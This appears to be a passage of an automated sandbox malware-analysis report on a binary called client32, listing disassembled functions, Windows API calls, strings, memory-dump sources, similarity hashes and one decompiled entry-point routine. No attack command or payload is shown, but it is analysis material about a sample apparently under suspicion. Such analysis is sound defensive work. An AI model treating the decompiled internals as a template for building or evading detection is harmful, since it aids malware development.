                                                                                                                              • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                                              • String ID: MiniDump
                                                                                                                              • API String ID: 1494854734-2840755058
                                                                                                                              • Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                                                              • Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
                                                                                                                              • Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                                                              • Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 111479B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadStringA.USER32 ref: 111479DF
                                                                                                                              • wsprintfA.USER32 ref: 11147A16
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                              • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                              • API String ID: 1985783259-2296142801
                                                                                                                              • Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                                                              • Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
                                                                                                                              • Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                                                              • Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 111101B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _malloc.LIBCMT ref: 111101C9
                                                                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                              • wsprintfA.USER32 ref: 111101E4
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              • _memset.LIBCMT ref: 11110207
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                                                              • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                                              • API String ID: 3234921582-2664294811
                                                                                                                              • Opcode ID: 280ad6f88800d969d30347863d68ea4ddbfee66c9be73721bdded0e9d7f91acb
                                                                                                                              • Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
                                                                                                                              • Opcode Fuzzy Hash: 280ad6f88800d969d30347863d68ea4ddbfee66c9be73721bdded0e9d7f91acb
                                                                                                                              • Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11145240 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                                                                              • __strdup.LIBCMT ref: 11145277
                                                                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                                                                              • _free.LIBCMT ref: 111452AC
                                                                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                              • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 398584587-0
                                                                                                                              • Opcode ID: 9735d3e61c58080a89fa20c82b25ab644093a8acf898cd5def549394436bc947
                                                                                                                              • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
                                                                                                                              • Opcode Fuzzy Hash: 9735d3e61c58080a89fa20c82b25ab644093a8acf898cd5def549394436bc947
                                                                                                                              • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1100EE20 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                                                                • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                                                                              • _free.LIBCMT ref: 1100EE64
                                                                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                              • _free.LIBCMT ref: 1100EE77
                                                                                                                              • _free.LIBCMT ref: 1100EE8A
                                                                                                                              • _free.LIBCMT ref: 1100EE9D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3515823920-0
                                                                                                                              • Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                                                              • Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
                                                                                                                              • Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                                                              • Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110F4B70 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3550192930-0
                                                                                                                              • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                                                              • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                                                                              • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                                                              • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11143E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,775EC740,?), ref: 11143E97
                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 11143EBF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile$ChangeCloseFindNotification
                                                                                                                              • String ID: "
                                                                                                                              • API String ID: 353575653-123907689
                                                                                                                              • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                                                              • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                                                                              • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                                                              • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110179E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 110179ED
                                                                                                                                • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000350,000000FF), ref: 1101792C
                                                                                                                                • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                                                • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                                                • Part of subcall function 110178F0: CoUninitialize.OLE32 ref: 110179C0
                                                                                                                                • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000350,000000FF), ref: 11017842
                                                                                                                                • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                                                • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                                                • Part of subcall function 11017810: CoUninitialize.OLE32 ref: 110178D0
                                                                                                                              • SetEvent.KERNEL32(00000350), ref: 11017A0D
                                                                                                                              • GetTickCount.KERNEL32 ref: 11017A13
                                                                                                                              Strings
                                                                                                                              • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                                                              • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                                              • API String ID: 3804766296-4122679463
                                                                                                                              • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                                                              • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                                                                              • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                                                              • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11070F90 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection$EnterLeaveSleep
                                                                                                                              • String ID: Push
                                                                                                                              • API String ID: 1566154052-4278761818
                                                                                                                              • Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                                                              • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                                                                              • Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                                                              • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00E31020 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			_entry_() {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				signed int _t13;
				int _t15;
				signed int _t16;
				signed short* _t17;

				_t17 = GetCommandLineW();
				if( *_t17 != 0x22) {
					while( *_t17 > 0x20) {
						_t17 =  &(_t17[1]);
					}
					L6:
					_t11 =  *_t17 & 0x0000ffff;
					if(_t11 == 0) {
						L9:
						_v72.dwFlags = 0;
						GetStartupInfoW( &_v72);
						_t13 = _v72.wShowWindow & 0x0000ffff;
						if((_v72.dwFlags & 0x00000001) == 0) {
							_t13 = 0xa;
						}
						_t15 = E00E31000(GetModuleHandleW(0), 0, _t17, _t13); // executed
						ExitProcess(_t15);
					}
					while(_t11 <= 0x20) {
						_t11 = _t17[1] & 0x0000ffff;
						_t17 =  &(_t17[1]);
						if(_t11 != 0) {
							continue;
						}
						goto L9;
					}
					goto L9;
				}
				_t16 = _t17[1] & 0x0000ffff;
				_t17 =  &(_t17[1]);
				if(_t16 == 0) {
					L4:
					if( *_t17 != 0x22) {
						goto L6;
					}
					L5:
					_t17 =  &(_t17[1]);
					goto L6;
				}
				while(_t16 != 0x22) {
					_t16 = _t17[1] & 0x0000ffff;
					_t17 =  &(_t17[1]);
					if(_t16 != 0) {
						continue;
					}
					goto L4;
				}
				goto L5;
			}









                                                                                                                              0x00e3102d
                                                                                                                              0x00e31033
                                                                                                                              0x00e310b0
                                                                                                                              0x00e310b6
                                                                                                                              0x00e310b6
                                                                                                                              0x00e3105c
                                                                                                                              0x00e3105c
                                                                                                                              0x00e31062
                                                                                                                              0x00e31076
                                                                                                                              0x00e3107a
                                                                                                                              0x00e31081
                                                                                                                              0x00e3108b
                                                                                                                              0x00e3108f
                                                                                                                              0x00e31091
                                                                                                                              0x00e31091
                                                                                                                              0x00e310a3
                                                                                                                              0x00e310a9
                                                                                                                              0x00e310a9
                                                                                                                              0x00e31064
                                                                                                                              0x00e3106a
                                                                                                                              0x00e3106e
                                                                                                                              0x00e31074
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00e31074
                                                                                                                              0x00000000
                                                                                                                              0x00e31064
                                                                                                                              0x00e31035
                                                                                                                              0x00e31039
                                                                                                                              0x00e3103f
                                                                                                                              0x00e31053
                                                                                                                              0x00e31057
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00e31059
                                                                                                                              0x00e31059
                                                                                                                              0x00000000
                                                                                                                              0x00e31059
                                                                                                                              0x00e31041
                                                                                                                              0x00e31047
                                                                                                                              0x00e3104b
                                                                                                                              0x00e31051
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
